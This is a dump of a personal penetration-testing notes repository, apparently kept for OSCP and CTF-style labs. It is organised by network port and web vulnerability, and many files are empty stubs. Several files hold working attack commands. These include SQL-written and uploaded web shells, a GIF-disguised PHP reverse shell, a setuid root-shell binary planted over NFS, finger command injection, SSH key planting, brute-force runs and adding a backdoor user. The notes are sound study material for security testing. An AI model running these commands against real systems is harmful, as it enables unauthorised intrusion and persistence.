├── README.md ├── mobile ├── ios │ ├── README.md │ └── ios-forensics.md ├── android │ └── support-and-tools.md └── tcm-mobile │ └── README.md ├── phishing ├── phishing-hiddeneye.md └── phishing.md ├── pentesting-network ├── 11211-memcached.md ├── 135-rpc.md ├── 9200-9300-elasticsearch.md ├── 80-443-http-s │ ├── drupal.md │ ├── node.js.md │ ├── phpmyadmin.md │ ├── joomla.md │ ├── webdav.md │ ├── tomcat.md │ ├── wordpress.md │ └── README.md ├── 6667-irc.md ├── 3632-distcc.md ├── 23-telnet.md ├── 464-kpasswd.md ├── 137-138-139-netbios.md ├── 88-kerberos.md ├── 111-rpcbind.md ├── 79-finger.md ├── 5985-winrm.md ├── 69-tftp.md ├── 873-rsync.md ├── 3128-squid.md ├── 5900-vnc.md ├── 27017-27018-27019-mongodb.md ├── 5432-postgresql.md ├── 2049-nfs.md ├── 21-ftp.md ├── 110-pop3.md ├── 389-ldap.md ├── 3389-rdp.md ├── 3306-mysql.md ├── 5984-6984-couchdb.md ├── 22-ssh.md ├── 161-snmp.md ├── 53-dns.md ├── 1433-mssql.md ├── 25-smtp.md ├── 6379-redis.md └── 139-445-smb.md ├── .gitbook └── assets │ └── image.png ├── pentesting-web ├── xss-cross-site-scripting │ └── README.md ├── unrestricted-file-upload.md ├── nosql-injection.md ├── burp-suite.md ├── web-testing.md ├── authentication.md ├── command-injection │ └── README.md ├── idor-insecure-direct-object-reference.md └── jwt-attacks.md ├── misc ├── note-taking.md ├── todo.md ├── containers.md ├── interesting-files.md ├── powershell.md ├── networking.md └── linux.md ├── post-exploitation ├── cleanup.md ├── maintaining-access.md ├── passwords.md └── tunneling-and-port-forwarding.md ├── apis ├── methodology │ └── README.md └── resources.md ├── scanning-and-enumeration ├── enumeration.md ├── network-scanning.md └── vulnerability-scanning.md ├── penetration-testing-methodology ├── the-cyber-kill-chain.md └── 5-stages-of-ethical-hacking.md ├── exploitation └── exploitation-basics.md ├── information-gathering-reconnaissance └── passive-reconnaissance.md ├── cloud └── aws │ └── README.md ├── active-directory ├── peh │ ├── README.md │ ├── post-compromise-attacks.md │ ├── initial-attack-vectors.md │ └── post-compromise-enumeration.md └── ad-basics.md ├── wireless └── wireless-hacking-101.md └── SUMMARY.md /README.md: -------------------------------------------------------------------------------- 1 | # Page 1 2 | 3 | -------------------------------------------------------------------------------- /mobile/ios/README.md: -------------------------------------------------------------------------------- 1 | # iOS 2 | 3 | -------------------------------------------------------------------------------- /phishing/phishing-hiddeneye.md: -------------------------------------------------------------------------------- 1 | # Phishing: HiddenEye 2 | 3 | -------------------------------------------------------------------------------- /pentesting-network/11211-memcached.md: -------------------------------------------------------------------------------- 1 | # 11211 (Memcached) 2 | 3 | -------------------------------------------------------------------------------- /pentesting-network/135-rpc.md: -------------------------------------------------------------------------------- 1 | # 135 (RPC) 2 | 3 | ## Enumeration 4 | 5 | #### 6 | -------------------------------------------------------------------------------- /pentesting-network/9200-9300-elasticsearch.md: -------------------------------------------------------------------------------- 1 | # 9200, 9300 (Elasticsearch) 2 | 3 | -------------------------------------------------------------------------------- /.gitbook/assets/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/H3r1CH/penetration-testing/HEAD/.gitbook/assets/image.png -------------------------------------------------------------------------------- /pentesting-web/xss-cross-site-scripting/README.md: -------------------------------------------------------------------------------- 1 | # XSS (Cross-Site Scripting) 2 | 3 | ## Finding 4 | 5 | ### Reflected 6 | 7 | ### Stored 8 | 9 | ### DOM-based 10 | 11 | ## Exploiting 12 | -------------------------------------------------------------------------------- /misc/note-taking.md: -------------------------------------------------------------------------------- 1 | # Note Taking 2 | 3 | ## Note Taking Tools 4 | 5 | * KeepNote 6 | * OneNote 7 | * CherryTree 8 | * Joplin 9 | 10 | ## Screenshot Tools 11 | 12 | * Greenshot 13 | * Flameshot 14 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/drupal.md: -------------------------------------------------------------------------------- 1 | # Drupal 2 | 3 | ## Scanning 4 | 5 | ### drupwn 6 | 7 | ```bash 8 | drupwn enum http:// 9 | ``` 10 | 11 | ### droopescan 12 | 13 | ```bash 14 | droopescan scan -u http:// 15 | ``` 16 | -------------------------------------------------------------------------------- /misc/todo.md: -------------------------------------------------------------------------------- 1 | # TODO 2 | 3 | ## Checklist 4 | 5 | ### HTB 6 | 7 | #### ippsec videos / ippsec.rocks 8 | 9 | * [ ] Timelapse 10 | * [ ] ... 11 | 12 | #### Rana, oxdf, other writeups 13 | 14 | ### THM 15 | 16 | #### Service Enumeration 17 | 18 | -------------------------------------------------------------------------------- /post-exploitation/cleanup.md: -------------------------------------------------------------------------------- 1 | # Cleanup 2 | 3 | ## Cleanup Overview 4 | 5 | * Make the system/network as it was when you entered it 6 | * Remove executables, scripts, and added files 7 | * Remove malware, rootkits, and added user accounts 8 | * Set settings back to original configurations 9 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/node.js.md: -------------------------------------------------------------------------------- 1 | # Node.js 2 | 3 | ## Exploitation 4 | 5 | ### Eval RCE 6 | 7 | 1. Intercept request 8 | 1. Test parameters for URL/base64 encoding 9 | 2. Test parameters for arithmetic evaluation i.e. 1+1 and see if the response contains 2. 10 | 11 | Example: Dibble on Proving Grounds 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /pentesting-network/6667-irc.md: -------------------------------------------------------------------------------- 1 | # 6667 (IRC) 2 | 3 | ## Enumeration 4 | 5 | ### nmap 6 | 7 | ```bash 8 | nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 irked.htb 9 | ``` 10 | 11 | ## Brute Force 12 | 13 | ### nmap 14 | 15 | ```bash 16 | nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p 17 | ``` 18 | -------------------------------------------------------------------------------- /post-exploitation/maintaining-access.md: -------------------------------------------------------------------------------- 1 | # Maintaining Access 2 | 3 | ## Maintaining Access Overview 4 | 5 | ### Persistence Scripts 6 | 7 | * Run `persistence -h` 8 | * `exploit/windows/local/persistence` 9 | * `exploit/windows/local/registry_persistence` 10 | 11 | ### Scheduled Tasks 12 | 13 | * Run `scheduleme` 14 | * Run `schtaskabuse` 15 | 16 | ### Add a User 17 | 18 | * `net user hacker password123 /add` 19 | -------------------------------------------------------------------------------- /pentesting-web/unrestricted-file-upload.md: -------------------------------------------------------------------------------- 1 | # Unrestricted File Upload 2 | 3 | ### Scenarios 4 | 5 | #### Blog comment where you can upload a photo 6 | 7 | Copy php-reverse-shell.php file and insert `GIF89a;` at the top of it: 8 | 9 | ```bash 10 | GIF89a; 11 | # Use searchsploit on nmap Service output details 7 | ``` 8 | 9 | ## Exploitation Checks 10 | 11 | Check if it's vulnerable to **CVE-2004-2687** to execute arbitrary code: 12 | 13 | ```bash 14 | msf5 > use exploit/unix/misc/distcc_exec 15 | nmap -p 3632 --script distcc-exec --script-args="distcc-exec.cmd='id'" 16 | ``` 17 | -------------------------------------------------------------------------------- /pentesting-network/23-telnet.md: -------------------------------------------------------------------------------- 1 | # 23 (Telnet) 2 | 3 | ## Enumeration 4 | 5 | ### Banner Grabbing 6 | 7 | ```bash 8 | nc -vn 23 9 | ``` 10 | 11 | ### nmap Scripts 12 | 13 | ```bash 14 | nmap -n -sV -Pn --script "*telnet* and safe" -p 23 15 | ``` 16 | 17 | ## Brute Force 18 | 19 | ```bash 20 | hydra -l root -P /root/SecLists/Passwords/10_million_password_list_top_100.txt telnet 21 | hydra -l root -P passwords.txt [-t 32] telnet 22 | ``` 23 | -------------------------------------------------------------------------------- /misc/containers.md: -------------------------------------------------------------------------------- 1 | # Containers 2 | 3 | ## Enumeration 4 | 5 | [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Container%20-%20Docker%20Pentest.md) 6 | 7 | ### deepce 8 | 9 | Like LinEnum.sh for containers. 10 | 11 | [https://github.com/stealthcopter/deepce](https://github.com/stealthcopter/deepce) 12 | -------------------------------------------------------------------------------- /apis/methodology/README.md: -------------------------------------------------------------------------------- 1 | # Methodology 2 | 3 | ## Methodologies 4 | 5 | * [https://github.com/dsopas/MindAPI](https://github.com/dsopas/MindAPI) 6 | * [https://github.com/shieldfy/API-Security-Checklist](https://github.com/shieldfy/API-Security-Checklist) 7 | * [https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/web-api-pentesting) 8 | 9 | ## Recon 10 | 11 | ## Attack 12 | -------------------------------------------------------------------------------- /pentesting-network/464-kpasswd.md: -------------------------------------------------------------------------------- 1 | # 464 (kpasswd) 2 | 3 | ## nmap output 4 | 5 | ```bash 6 | 464/tcp open kpasswd5? 7 | ``` 8 | 9 | > The fact you're seeing this service and port suggests you may be scanning a Domain Controller, for which both UDP & TCP ports 464 are used by the Kerberos Password Change. This port in particular is used for changing/setting passwords against Active Directory. 10 | > 11 | > [https://security.stackexchange.com/questions/205492/what-is-this-service](https://security.stackexchange.com/questions/205492/what-is-this-service) 12 | -------------------------------------------------------------------------------- /pentesting-network/137-138-139-netbios.md: -------------------------------------------------------------------------------- 1 | # 137,138,139 (NetBIOS) 2 | 3 | ## Enumerations 4 | 5 | ### Commands & Tools 6 | 7 | #### nbtstat 8 | 9 | ```bash 10 | nbtstat -n 11 | nbtstat -A 12 | ``` 13 | 14 | #### nbtscan 15 | 16 | ```bash 17 | nbtscan -v 18 | ``` 19 | 20 | #### net 21 | 22 | ```bash 23 | net view # List domains, computers, and resources shared 24 | net use K: \\\C # Connect to a computer from a shared resource 25 | ``` 26 | 27 | #### nmap 28 | 29 | ```bash 30 | sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n 31 | ``` 32 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/phpmyadmin.md: -------------------------------------------------------------------------------- 1 | # phpMyAdmin 2 | 3 | ## Enumeration 4 | 5 | Default credentials: `root:` 6 | 7 | 8 | 9 | ## Exploitation 10 | 11 | ### Web Shell 12 | 13 | 1. Identify the web server path: Ex: Wamp server is C:/wamp/www/ 14 | 2. Create web shell file via SQL query in phpMyAdmin 15 | 1. `select "" into outfile "C:/wamp/www/shell.php"` 16 | 3. Navigate to the path of the uploaded shell and execute a command: 17 | 1. http://\/shell.php?cmd=whoami 18 | 4. And if successful, command execution is available. 19 | 20 | -------------------------------------------------------------------------------- /pentesting-network/88-kerberos.md: -------------------------------------------------------------------------------- 1 | # 88 (Kerberos) 2 | 3 | ## Enumeration 4 | 5 | ### Authenticated 6 | 7 | #### Kerbrute 8 | 9 | ```bash 10 | /opt/kerbrute/kerbrute_linux_amd64 userenum --dc 10.10.86.5 -d lab.enterprise.thm /opt/SecLists/Usernames/xato-net-10-million-usernames.txt -o users.txt 11 | /opt/kerbrute/kerbrute_linux_amd64 passwordspray --dc -d intelligence.htb users.txt 12 | ``` 13 | 14 | GetUserSPNs 15 | 16 | ``` 17 | kali@kali:~/ctf/tryhackme/enterprise$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.10.55.72 LAB.ENTERPRISE.THM/nik 18 | ``` 19 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/joomla.md: -------------------------------------------------------------------------------- 1 | # Joomla 2 | 3 | ## Interesting Files 4 | 5 | * /administrator 6 | * /administrator/manifests/files/joomla.xml 7 | * /language/en-GB/en-GB.xml 8 | 9 | ## Scanning 10 | 11 | ### joomscan 12 | 13 | ```bash 14 | perl joomscan.pl -u 15 | ``` 16 | 17 | ## Exploitation 18 | 19 | ### Templates 20 | 21 | View template, Copy template and rename, select newly created template, modify index.php file with PHP reverse shell code, Save. Start netcat listener and navigate to the new template /templates/shelly 22 | 23 | After getting on the filesystem look at the web directory. 24 | -------------------------------------------------------------------------------- /pentesting-network/111-rpcbind.md: -------------------------------------------------------------------------------- 1 | # 111 (Rpcbind) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check for passwords in files on mountable drives 8 | 9 | ### rpcbind 10 | 11 | ```bash 12 | rpcbind -p 192.168.1.101 13 | ``` 14 | 15 | ### rpcinfo 16 | 17 | ```bash 18 | rpcinfo irked.htb 19 | nmap -sSUC -p111 192.168.10.1 20 | ``` 21 | 22 | ```bash 23 | #check general rpc info 24 | rpcinfo 25 | 26 | #Check what shares you can mount 27 | showmount -e 28 | 29 | #mounting the share 30 | #make the directory 31 | mkdir /mnt/share 32 | #mount the share 33 | mount -t nfs :/share /mnt/share -nolock 34 | ``` 35 | 36 | ### nmap 37 | 38 | ```bash 39 | nmap -v -p 111 --script=nfs* 40 | 41 | rpcclient -U "" $target 42 | rpcclient $> enumdomusers 43 | rpcclient $> queryuser 0xrid_ID 44 | ``` 45 | -------------------------------------------------------------------------------- /scanning-and-enumeration/enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | TCM's modified script - [https://pastebin.com/MhE6zXVt](https://pastebin.com/MhE6zXVt) 4 | 5 | ## Some Steps 6 | 7 | 1. nmap scan 8 | 2. nmap script scan (http, smb, smtp, tftp, etc.) 9 | 3. Metasploit enumeration 10 | 4. searchsploit / exploitDB (others) 11 | 5. Google 12 | 13 | ### Other Tools 14 | 15 | * Reconnoitre 16 | * Vanquish 17 | * Sn1per 18 | * SPARTA 19 | 20 | ## Ping 21 | 22 | > When pinging a machine we can confirm the OS type by the TTL. 23 | > 24 | > Windows default TTL is 128 which decreases by 1 when a packet traverses a router, so look for 127. If its between 64 and 128, chances are it's Windows. 25 | > 26 | > Linux default TTL is 64. If its below 64, chances are it's Linux. 27 | > 28 | > Anything above 128, chances are it is a network infrastructure. Cisco router is 255. 29 | -------------------------------------------------------------------------------- /pentesting-network/79-finger.md: -------------------------------------------------------------------------------- 1 | # 79 (Finger) 2 | 3 | ## Enumeration 4 | 5 | ### Banner Grabbing 6 | 7 | ```bash 8 | nc -vn 79 9 | echo "root" | nc -vn 79 10 | ``` 11 | 12 | ### nmap 13 | 14 | ```bash 15 | nmap -vvv -Pn -sC -sV -p79 16 | ``` 17 | 18 | ### finger 19 | 20 | ```bash 21 | finger @ 22 | finger @ 23 | finger @ #List users 24 | finger admin@ #Get info of user 25 | finger user@ #Get info of user 26 | ``` 27 | 28 | ### finger-user-enum 29 | 30 | ```bash 31 | finger-user-enum.pl -U users.txt -t 10.0.0.1 32 | finger-user-enum.pl -u root -t 10.0.0.1 33 | finger-user-enum.pl -U users.txt -T ips.txt 34 | ``` 35 | 36 | ### Metasploit 37 | 38 | ```bash 39 | use auxiliary/scanner/finger/finger_users 40 | ``` 41 | 42 | ## Command Execution 43 | 44 | ```bash 45 | finger "|/bin/id@" 46 | finger "|/bin/ls -a /" 47 | 48 | finger "|/bin/id@example.com" 49 | finger "|/bin/ls -a /@example.com" 50 | ``` 51 | -------------------------------------------------------------------------------- /pentesting-network/5985-winrm.md: -------------------------------------------------------------------------------- 1 | # 5985 (WinRM) 2 | 3 | ## Enumeration 4 | 5 | ## Connection 6 | 7 | #### crackmapexec 8 | 9 | ```bash 10 | crackmapexec winrm -u -p 11 | crackmapexec winrm -u -p -X "whoami" # Run a command 12 | ``` 13 | 14 | #### evil-winrm 15 | 16 | PowerShell Remoting 17 | 18 | ```bash 19 | # Attempt to log into the machine 20 | evil-winrm -i -u -p 21 | evil-winrm -i -u -H 22 | # Specify a local directory to execute scripts from 23 | evil-winrm -i -u -p -s . 24 | ``` 25 | 26 | Upload File to Target 27 | 28 | ```bash 29 | # From compromised target 30 | Evil-WinRM PS C:\Users\FSmith\Documents> upload winPEAS.exe 31 | Evil-WinRM PS C:\Users\FSmith\Documents> .\winPEAS.exe 32 | ``` 33 | 34 | Download From from Target 35 | 36 | ```bash 37 | # From compromised target 38 | Evil-WinRM PS C:\Users\FSmith\Documents> download 123_BloodHound.zip 39 | ``` 40 | -------------------------------------------------------------------------------- /pentesting-network/69-tftp.md: -------------------------------------------------------------------------------- 1 | # 69 (TFTP) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Search for files to find sensitive info like passwords 8 | * [ ] Uploads shells to trigger them in a webapp 9 | 10 | ### nmap 11 | 12 | ```bash 13 | nmap -sU -p 69 --script tftp-enum.nse 14 | nmap -n -Pn -sU -p69 -sV --script tftp-enum 15 | nmap -sU -p 69 --script tftp-enum.nse 16 | ``` 17 | 18 | ### Connection 19 | 20 | ```bash 21 | #setup the connection 22 | tftp 172.16.200.100 23 | #get a file 24 | tftp> get /etc/passwd 25 | #upload reverse shell 26 | tftp> put shell.php 27 | 28 | # Need unauthenticate access 29 | tftp 30 | tftp> ls 31 | ?Invalid command 32 | tftp> verbose 33 | Verbose mode on. 34 | tftp> put shell.php 35 | Sent 3605 bytes in 0.0 seconds [inf bits/sec] 36 | ``` 37 | 38 | ### Metasploit 39 | 40 | ```bash 41 | msfconsole 42 | use tftpbrute 43 | set dictionary /usr/share/metasploit-framework/data/wordlists/sensitive_files.txt 44 | 45 | msf5> auxiliary/admin/tftp/tftp_transfer_util 46 | ``` 47 | -------------------------------------------------------------------------------- /pentesting-network/873-rsync.md: -------------------------------------------------------------------------------- 1 | # 873 (rsync) 2 | 3 | ## Enumeration 4 | 5 | ### Banner 6 | 7 | #### nc 8 | 9 | ```bash 10 | nc -vn 873 11 | ``` 12 | 13 | ### Modules 14 | 15 | #### nmap 16 | 17 | ```bash 18 | sudo nmap -sV --script "rsync-list-modules" -p 873 19 | ``` 20 | 21 | #### Metasploit 22 | 23 | ```bash 24 | msf> use auxiliary/scanner/rsync/modules_list 25 | ``` 26 | 27 | ### rsync 28 | 29 | Unauthenticated 30 | 31 | ```bash 32 | rsync -av --list-only rsync://192.168.76.126/fox 33 | rsync -av rsync://192.168.76.126/fox ./rsync/ 34 | ``` 35 | 36 | Authenticated 37 | 38 | ```bash 39 | rsync -av --list-only rsync://username@192.168.0.123/fox 40 | rsync -av rsync://username@192.168.0.123:8730/fox ./rsync_shared 41 | ``` 42 | 43 | Upload a file (i.e. an authorized\_keys file to obtain access to a machine) 44 | 45 | ```bash 46 | mkdir .ssh 47 | ssh-keygen -f .ssh/fox-ssh -t ecdsa -b 521 48 | cp .ssh/fox-ssh.pub .ssh/authorized_keys 49 | rsync -av .ssh/ rsync://fox@192.168.76.126/fox/.ssh 50 | ``` 51 | 52 | ## Brute Force 53 | 54 | ```bash 55 | nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 56 | 57 | ``` 58 | 59 | -------------------------------------------------------------------------------- /misc/interesting-files.md: -------------------------------------------------------------------------------- 1 | # Interesting Files 2 | 3 | ## File Types 4 | 5 | ### zip 6 | 7 | ```bash 8 | # Try to unzip file 9 | unzip filename.zip 10 | # If a passwowrd is needed, attempt to crack it 11 | zip2john filename.zip >> filename.zip.hash 12 | john filename.zip.hash --wordlist=/usr/share/wordlist/rockyou.txt 13 | ``` 14 | 15 | ### rar 16 | 17 | ```bash 18 | unrar e filename.rar 19 | rar2john filename.rar >> filename.rar.hash 20 | john filename.rar.hash --wordlist=/usr/share/wordlist/rockyou.txt 21 | ``` 22 | 23 | ### pfx 24 | 25 | ```bash 26 | # Try to view file info 27 | openssl pkcs12 -in filename.pfx -info 28 | # If a password is needed, attempt to crack it 29 | pfx2john filename.pfx >> filename.pfx.hash 30 | john filename.pfx.hash --wordlist=/usr/share/wordlist/rockyou.txt 31 | ``` 32 | 33 | After putting in the password it will extract certificates and private keys. 34 | 35 | ```bash 36 | # Extract the keys 37 | openssl pkcs12 -in filename.pfx -nocerts -out key.pem -nodes 38 | # Extract the certificates 39 | openssl pkcs12 -in filename.pfx -nokeys -out key.cert 40 | ``` 41 | 42 | If the WinRM port (5985,5986) is open it could be possible to login to the target using Evil-WinRm. 43 | 44 | ```bash 45 | evil-winrm -S -i -c key.cert -k key.pem 46 | ``` 47 | 48 | 49 | 50 | -------------------------------------------------------------------------------- /pentesting-web/nosql-injection.md: -------------------------------------------------------------------------------- 1 | # NoSQL Injection 2 | 3 | ## Example 4 | 5 | > Example using a login form for Admin Access with username and password 6 | 7 | * Intercept the login request with a basic username and password. 8 | * If the Content-Type and data are not in JSON form it will have to be converted: 9 | * Manually, changing Content-Type to `application/json` 10 | * Burp Extension 'Content Type Converter' 11 | * Then right click in the request, select Content Type Converter, and select JSON 12 | * May still need to modify the data to use JSON format, ex: 13 | * Before: `username=admin@admin.com&password=password&redirectPage=` 14 | * After: `{"username": "admin@admin.com", "password": "password"}` 15 | * Send the request to get some response 16 | * Example payloads below: 17 | 18 | ```bash 19 | # Grab user where username is admin@admin.com and the password that is not equal to blank 20 | {"username": "admin@admin.com", "password": {"$ne":""}} 21 | # and the password that has a value greater than an empty string 22 | {"username": "admin@admin.com", "password": {"$gt":""}} 23 | ``` 24 | 25 | ## Payloads 26 | 27 | [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection) 28 | 29 | -------------------------------------------------------------------------------- /pentesting-network/3128-squid.md: -------------------------------------------------------------------------------- 1 | # 3128 (Squid) 2 | 3 | ## Enumeration 4 | 5 | #### curl 6 | 7 | ```bash 8 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189 9 | # After finding other open ports using spose: 10 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189:3306 11 | curl --proxy http://192.168.76.189:3128 http://192.168.76.189:8080 12 | 13 | ``` 14 | 15 | #### spose 16 | 17 | [https://github.com/aancw/spose](https://github.com/aancw/spose) 18 | 19 | ```bash 20 | python3 spose.py --proxy http://192.168.76.189:3128 --target 192.168.76.189 21 | Using proxy address http://192.168.76.189:3128 22 | 192.168.76.189 3306 seems OPEN 23 | 192.168.76.189 8080 seems OPEN 24 | ``` 25 | 26 | #### nmap 27 | 28 | You can use `nmap` to try to do additional scanning with `proxychains` by updating the proxychains.conf file using the following at the bottom of the file: 29 | 30 | `socks5 192.168.76.189 3128` or `http 192.168.76.189 3129` 31 | 32 | ```bash 33 | proxychains sudo nmap -sT -n -p3306,8080 192.168.76.189 -Pn 34 | ``` 35 | 36 | #### Webpage 37 | 38 | If a webpage is found, you can update the proxy settings in your browser or FoxyProxy to be configured with the proxy URL and port and then navigate to the page: [http://192.168.76.189:3128](http://192.168.76.189:3128) 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /pentesting-network/80-443-http-s/webdav.md: -------------------------------------------------------------------------------- 1 | # WebDAV 2 | 3 | ## Scanning 4 | 5 | ### nmap 6 | 7 | ```bash 8 | nmap --script=http-webdav-scan,http-iis-webdav-vuln 9 | # Check for the HTTP Methods especially for PUT 10 | ``` 11 | 12 | ### cadaver 13 | 14 | ```bash 15 | cadaver 16 | dav:/> put /usr/share/webshells/aspx/cmdasp.aspx awen.txt # Example uploading shell 17 | dav:/> mv awen.txt awen.aspx # Change the file type of the uploaded file 18 | # Navigate to the awen.aspx file in the browser 19 | ``` 20 | 21 | ```bash 22 | kali@kali:~/Documents/offsec/oscp/proving_grounds/Hutch$ cadaver 192.168.71.122 23 | Authentication required for 192.168.71.122 on server `192.168.71.122': 24 | Username: 25 | Password: 26 | dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx 27 | Uploading /usr/share/webshells/aspx/cmdasp.aspx to `/cmdasp.aspx': 28 | Progress: [=============================>] 100.0% of 1400 bytes succeeded. 29 | # Navigate to the cmdasp.aspx file in the browser 30 | # Can then create a reverse shell payload with msfvenom, upload that using dav, 31 | # then call it from the cmdasp.aspx page using the full path 32 | ``` 33 | 34 | ### davtest 35 | 36 | ```bash 37 | davtest --url http:// 38 | davtest -move -sendbd auto -url http://:8080/webdav/ 39 | ``` 40 | 41 | ### 42 | -------------------------------------------------------------------------------- /pentesting-network/5900-vnc.md: -------------------------------------------------------------------------------- 1 | # 5900 (VNC) 2 | 3 | ## Checks 4 | 5 | * [ ] Check for easy VNC passwords 6 | * [ ] Check for exploits for VNC version 7 | * [ ] Brute force VNC password 8 | 9 | ## Enumeration 10 | 11 | ### nmap 12 | 13 | ```bash 14 | nmap -sV -Pn -p 5900 --script=vnc-info,vnc-title,realvnc-auth-bypass -oA 5900_nmap_VNC 15 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 16 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p 17 | nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 18 | ``` 19 | 20 | ### Metasploit 21 | 22 | #### Login Scan 23 | 24 | ```bash 25 | use auxiliary/scanner/vnc/vnc_login 26 | set rhosts 27 | run 28 | ``` 29 | 30 | #### No-auth Scan 31 | 32 | ```bash 33 | use auxiliary/scanner/vnc/vnc_none_auth 34 | set rhosts 35 | run 36 | ``` 37 | 38 | #### Post exploit module 39 | 40 | ```bash 41 | background 42 | use post/windows/gather/credentials/vnc 43 | set session X 44 | exploit 45 | 46 | vncviewer 192.168.1.109 47 | ``` 48 | 49 | ## Connection 50 | 51 | ```bash 52 | vncviewer [-passwd passwd.txt] ::5901 53 | vncviewer : 54 | ``` 55 | 56 | ## Brute Force 57 | 58 | ```bash 59 | hydra -s 5900 -P /usr/share/seclists/Passwords/darkweb2017-top10.txt -t 30 vnc 60 | hydra -L –P -s vnc -u -vV 61 | ``` 62 | -------------------------------------------------------------------------------- /pentesting-network/27017-27018-27019-mongodb.md: -------------------------------------------------------------------------------- 1 | # 27017, 27018, 27019 (MongoDB) 2 | 3 | ## Login 4 | 5 | By default mongo does not require password.\ 6 | **Admin** is a common mongo database. 7 | 8 | ```bash 9 | mongo 10 | mongo : 11 | mongo :/ 12 | mongo -u -p '' 13 | ``` 14 | 15 | The nmap script: _**mongodb-brute**_ will check if creds are needed. 16 | 17 | ```bash 18 | nmap -n -sV --script mongodb-brute -p 27017 19 | ``` 20 | 21 | **Some MongoDB commands:** 22 | 23 | 
help
24 | show dbs
25 | use <db>
26 | show collections
27 | db.<collection>.find()  // Dump the collection
28 | db.<collection>.count()  // Number of records of the collection
29 | db.current.find({"username":"admin"})  // Find in current db the username admin
30 |
31 | 32 | ```mongodb 33 | use // Create and switch to new DB 34 | db.users.insertOne({name: 'jeremy'}) // Insert some data into the DB 35 | db.users.insertOne({name: 'jessamy', country: 'scotland'}) 36 | db.users.find() 37 | db.users.find().limit(1) // View the first record 38 | db.users.find({country: 'scotland'}) // Find records where the country as scotland 39 | db.users.find({country: {"$ne": 'scotland'}}) // Find records where country is not scotland 40 | 41 | ``` 42 | -------------------------------------------------------------------------------- /pentesting-network/5432-postgresql.md: -------------------------------------------------------------------------------- 1 | # 5432 (postgresql) 2 | 3 | ## Enumeration 4 | 5 | ### Connection 6 | 7 | #### Default Credentials 8 | 9 | `postgres:postgres` 10 | 11 | ```bash 12 | psql -U # Open psql console with user 13 | psql -h -U -d # Remote connection 14 | psql -h -p -U -W # Remote connection 15 | ``` 16 | 17 | ### Commands 18 | 19 | ```sql 20 | psql -h localhost -d -U # Password will be prompted 21 | \list # List databases 22 | \c # use the database 23 | \d # List tables 24 | \du+ # Get users roles 25 | ``` 26 | 27 | ## Exploitation 28 | 29 | ### RCE - Authenticated 30 | 31 | #### searchsploit 32 | 33 | ```bash 34 | kali@kali:~/Documents/offsec/oscp/proving_grounds/Nibbles$ searchsploit postgresql 35 | --------------------------------------------------------------------------------- --------------------------------- 36 | Exploit Title | Path 37 | --------------------------------------------------------------------------------- --------------------------------- 38 | PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) | multiple/remote/50847.py 39 | --------------------------------------------------------------------------------- --------------------------------- 40 | ``` 41 | 42 | 43 | 44 | -------------------------------------------------------------------------------- /pentesting-network/2049-nfs.md: -------------------------------------------------------------------------------- 1 | # 2049 (NFS) 2 | 3 | ## Enumeration 4 | 5 | ### nmap Scripts 6 | 7 | ```bash 8 | nmap -p 2049 --script=nfs* 9 | nfs-ls # List NFS exports and check permissions 10 | nfs-showmount # Like showmount -e 11 | nfs-statfs # Disk statistics and info from NFS share 12 | ``` 13 | 14 | ### Metasploit 15 | 16 | Scan NFS mounts and list permissions. 17 | 18 | ```bash 19 | scanner/nfs/nfsmount 20 | ``` 21 | 22 | ### Check Shares 23 | 24 | Check Available Folders 25 | 26 | ```bash 27 | showmount -e 28 | cat /etc/exports # List exported shares 29 | ``` 30 | 31 | ## Mounting 32 | 33 | ### Create Mount 34 | 35 | ```bash 36 | # Syntax 37 | mount -t nfs [-o vers=2] : -o nolock 38 | # Example 39 | mkdir /mnt/myroot 40 | mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/myroot -o nolock 41 | # Unmount the mount 42 | umount /mnt/myroot/ 43 | ``` 44 | 45 | #### Using SSH 46 | 47 | ```bash 48 | ssh-keygen # Generate Key Pair 49 | mkdir /mnt/myroot 50 | mount -t nfs :/ /mnt/myroot 51 | cat .ssh/id_rsa.pub >> /mnt/myroot/root/.ssh/authorized_keys 52 | umount /mnt/myroot/ 53 | ``` 54 | 55 | ### Example Exploit 56 | 57 | #### From Attacker as root user 58 | 59 | ```bash 60 | mkdir 61 | mount -v -t nfs : 62 | cd 63 | echo 'int main(void){setreuid(0,0); system("/bin/bash"); return 0;}' > pwn.c 64 | gcc pwn.c -o pwn 65 | chmod +s pwn 66 | ``` 67 | 68 | #### From Target as Victim 69 | 70 | ```bash 71 | cd 72 | ./pwn # Root shell 73 | ``` 74 | -------------------------------------------------------------------------------- /penetration-testing-methodology/the-cyber-kill-chain.md: -------------------------------------------------------------------------------- 1 | # The Cyber Kill 